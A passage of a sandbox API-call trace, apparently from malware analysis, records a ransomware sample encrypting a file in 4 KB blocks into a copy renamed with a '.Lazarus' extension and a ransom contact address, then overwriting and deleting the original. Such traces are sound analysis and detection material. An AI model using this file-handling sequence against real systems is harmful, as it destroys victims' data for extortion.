Size=0x20) returned 0x88630 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.558] GetLastError () returned 0x0 [0061.558] SetLastError (dwErrCode=0x0) [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0061.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0061.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0061.559] GetLastError () returned 0x0 [0061.559] SetLastError (dwErrCode=0x0) [0061.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0061.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0061.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0061.559] AreFileApisANSI () returned 1 [0061.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0061.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0061.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0061.559] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.559] GetFileType (hFile=0x428) returned 0x1 [0061.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0061.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0061.560] AreFileApisANSI () returned 1 [0061.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0061.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 45 [0061.560] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.560] GetFileType (hFile=0x420) returned 0x1 [0061.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0061.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.560] GetLastError () returned 0x0 [0061.560] SetLastError (dwErrCode=0x0) [0061.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.560] GetLastError () returned 0x0 [0061.560] SetLastError (dwErrCode=0x0) [0061.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0061.561] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0061.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0061.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0061.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.671] GetLastError () returned 0x0 [0061.671] SetLastError (dwErrCode=0x0) [0061.672] GetLastError () returned 0x0 [0061.672] SetLastError (dwErrCode=0x0) [0061.672] GetLastError () returned 0x0 [0061.672] SetLastError (dwErrCode=0x0) [0061.673] GetLastError () returned 0x0 [0061.673] SetLastError (dwErrCode=0x0) [0061.673] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.673] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.674] GetLastError () returned 0x0 [0061.674] SetLastError (dwErrCode=0x0) [0061.674] GetLastError () returned 0x0 [0061.674] SetLastError (dwErrCode=0x0) [0061.675] GetLastError () returned 0x0 [0061.675] SetLastError (dwErrCode=0x0) [0061.676] GetLastError () returned 0x0 [0061.676] SetLastError (dwErrCode=0x0) [0061.676] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.676] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.676] GetLastError () returned 0x0 [0061.676] SetLastError (dwErrCode=0x0) [0061.676] GetLastError () returned 0x0 [0061.676] SetLastError (dwErrCode=0x0) [0061.676] GetLastError () returned 0x0 [0061.676] SetLastError (dwErrCode=0x0) [0061.676] GetLastError () returned 0x0 [0061.677] SetLastError (dwErrCode=0x0) [0061.677] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.677] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.677] GetLastError () returned 0x0 [0061.677] SetLastError (dwErrCode=0x0) [0061.677] GetLastError () returned 0x0 [0061.677] SetLastError (dwErrCode=0x0) [0061.677] GetLastError () returned 0x0 [0061.677] SetLastError (dwErrCode=0x0) [0061.677] GetLastError () returned 0x0 [0061.677] SetLastError (dwErrCode=0x0) [0061.678] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.679] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.679] GetLastError () returned 0x0 [0061.679] SetLastError (dwErrCode=0x0) [0061.679] GetLastError () returned 0x0 [0061.679] SetLastError (dwErrCode=0x0) [0061.679] GetLastError () returned 0x0 [0061.679] SetLastError (dwErrCode=0x0) [0061.679] GetLastError () returned 0x0 [0061.679] SetLastError (dwErrCode=0x0) [0061.679] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.680] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.680] GetLastError () returned 0x0 [0061.680] SetLastError (dwErrCode=0x0) [0061.680] GetLastError () returned 0x0 [0061.680] SetLastError (dwErrCode=0x0) [0061.680] GetLastError () returned 0x0 [0061.680] SetLastError (dwErrCode=0x0) [0061.680] GetLastError () returned 0x0 [0061.680] SetLastError (dwErrCode=0x0) [0061.680] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.681] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.681] GetLastError () returned 0x0 [0061.681] SetLastError (dwErrCode=0x0) [0061.681] GetLastError () returned 0x0 [0061.681] SetLastError (dwErrCode=0x0) [0061.681] GetLastError () returned 0x0 [0061.681] SetLastError (dwErrCode=0x0) [0061.681] GetLastError () returned 0x0 [0061.681] SetLastError (dwErrCode=0x0) [0061.681] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.681] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.682] GetLastError () returned 0x0 [0061.682] SetLastError (dwErrCode=0x0) [0061.682] GetLastError () returned 0x0 [0061.682] SetLastError (dwErrCode=0x0) [0061.682] GetLastError () returned 0x0 [0061.682] SetLastError (dwErrCode=0x0) [0061.682] GetLastError () returned 0x0 [0061.682] SetLastError (dwErrCode=0x0) [0061.682] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.682] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.683] GetLastError () returned 0x0 [0061.683] SetLastError (dwErrCode=0x0) [0061.683] GetLastError () returned 0x0 [0061.683] SetLastError (dwErrCode=0x0) [0061.683] GetLastError () returned 0x0 [0061.683] SetLastError (dwErrCode=0x0) [0061.683] GetLastError () returned 0x0 [0061.683] SetLastError (dwErrCode=0x0) [0061.683] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.683] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.684] GetLastError () returned 0x0 [0061.684] SetLastError (dwErrCode=0x0) [0061.684] GetLastError () returned 0x0 [0061.684] SetLastError (dwErrCode=0x0) [0061.684] GetLastError () returned 0x0 [0061.684] SetLastError (dwErrCode=0x0) [0061.684] GetLastError () returned 0x0 [0061.684] SetLastError (dwErrCode=0x0) [0061.684] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.684] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.685] GetLastError () returned 0x0 [0061.685] SetLastError (dwErrCode=0x0) [0061.685] GetLastError () returned 0x0 [0061.685] SetLastError (dwErrCode=0x0) [0061.685] GetLastError () returned 0x0 [0061.685] SetLastError (dwErrCode=0x0) [0061.685] GetLastError () returned 0x0 [0061.685] SetLastError (dwErrCode=0x0) [0061.685] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.685] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.686] GetLastError () returned 0x0 [0061.686] SetLastError (dwErrCode=0x0) [0061.686] GetLastError () returned 0x0 [0061.686] SetLastError (dwErrCode=0x0) [0061.686] GetLastError () returned 0x0 [0061.686] SetLastError (dwErrCode=0x0) [0061.686] GetLastError () returned 0x0 [0061.686] SetLastError (dwErrCode=0x0) [0061.686] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.686] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.687] GetLastError () returned 0x0 [0061.687] SetLastError (dwErrCode=0x0) [0061.687] GetLastError () returned 0x0 [0061.687] SetLastError (dwErrCode=0x0) [0061.687] GetLastError () returned 0x0 [0061.687] SetLastError (dwErrCode=0x0) [0061.687] GetLastError () returned 0x0 [0061.687] SetLastError (dwErrCode=0x0) [0061.687] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.687] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.688] GetLastError () returned 0x0 [0061.688] SetLastError (dwErrCode=0x0) [0061.688] GetLastError () returned 0x0 [0061.688] SetLastError (dwErrCode=0x0) [0061.688] GetLastError () returned 0x0 [0061.688] SetLastError (dwErrCode=0x0) [0061.688] GetLastError () returned 0x0 [0061.688] SetLastError (dwErrCode=0x0) [0061.688] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.688] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.689] GetLastError () returned 0x0 [0061.689] SetLastError (dwErrCode=0x0) [0061.689] GetLastError () returned 0x0 [0061.689] SetLastError (dwErrCode=0x0) [0061.690] GetLastError () returned 0x0 [0061.690] SetLastError (dwErrCode=0x0) [0061.690] GetLastError () returned 0x0 [0061.690] SetLastError (dwErrCode=0x0) [0061.690] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.690] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.690] GetLastError () returned 0x0 [0061.690] SetLastError (dwErrCode=0x0) [0061.690] GetLastError () returned 0x0 [0061.690] SetLastError (dwErrCode=0x0) [0061.690] GetLastError () returned 0x0 [0061.690] SetLastError (dwErrCode=0x0) [0061.691] GetLastError () returned 0x0 [0061.691] SetLastError (dwErrCode=0x0) [0061.691] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.691] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.691] GetLastError () returned 0x0 [0061.691] SetLastError (dwErrCode=0x0) [0061.691] GetLastError () returned 0x0 [0061.691] SetLastError (dwErrCode=0x0) [0061.691] GetLastError () returned 0x0 [0061.691] SetLastError (dwErrCode=0x0) [0061.691] GetLastError () returned 0x0 [0061.691] SetLastError (dwErrCode=0x0) [0061.692] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.692] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.692] GetLastError () returned 0x0 [0061.692] SetLastError (dwErrCode=0x0) [0061.692] GetLastError () returned 0x0 [0061.692] SetLastError (dwErrCode=0x0) [0061.692] GetLastError () returned 0x0 [0061.692] SetLastError (dwErrCode=0x0) [0061.692] GetLastError () returned 0x0 [0061.692] SetLastError (dwErrCode=0x0) [0061.692] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.693] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.693] GetLastError () returned 0x0 [0061.693] SetLastError (dwErrCode=0x0) [0061.693] GetLastError () returned 0x0 [0061.693] SetLastError (dwErrCode=0x0) [0061.693] GetLastError () returned 0x0 [0061.693] SetLastError (dwErrCode=0x0) [0061.693] GetLastError () returned 0x0 [0061.693] SetLastError (dwErrCode=0x0) [0061.693] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0xc4a, lpOverlapped=0x0) returned 1 [0061.693] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.694] GetLastError () returned 0x0 [0061.694] SetLastError (dwErrCode=0x0) [0061.694] GetLastError () returned 0x0 [0061.694] SetLastError (dwErrCode=0x0) [0061.694] GetLastError () returned 0x0 [0061.694] SetLastError (dwErrCode=0x0) [0061.694] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.694] GetLastError () returned 0x0 [0061.694] SetLastError (dwErrCode=0x0) [0061.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa) returned 0x7d4f8 [0061.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0061.694] GetLastError () returned 0x0 [0061.694] SetLastError (dwErrCode=0x0) [0061.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0061.695] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xc50, lpOverlapped=0x0) returned 1 [0061.695] GetLastError () returned 0x0 [0061.695] SetLastError (dwErrCode=0x0) [0061.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0061.695] GetLastError () returned 0x0 [0061.695] SetLastError (dwErrCode=0x0) [0061.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0061.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0061.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.695] CloseHandle (hObject=0x428) returned 1 [0061.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0061.698] CloseHandle (hObject=0x420) returned 1 [0061.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0061.698] AreFileApisANSI () returned 1 [0061.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0061.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 45 [0061.698] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.700] GetFileType (hFile=0x420) returned 0x1 [0061.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0061.700] GetLastError () returned 0xb7 [0061.700] SetLastError (dwErrCode=0xb7) [0061.700] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0061.701] CloseHandle (hObject=0x420) returned 1 [0061.701] AreFileApisANSI () returned 1 [0061.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0061.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 45 [0061.701] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml")) 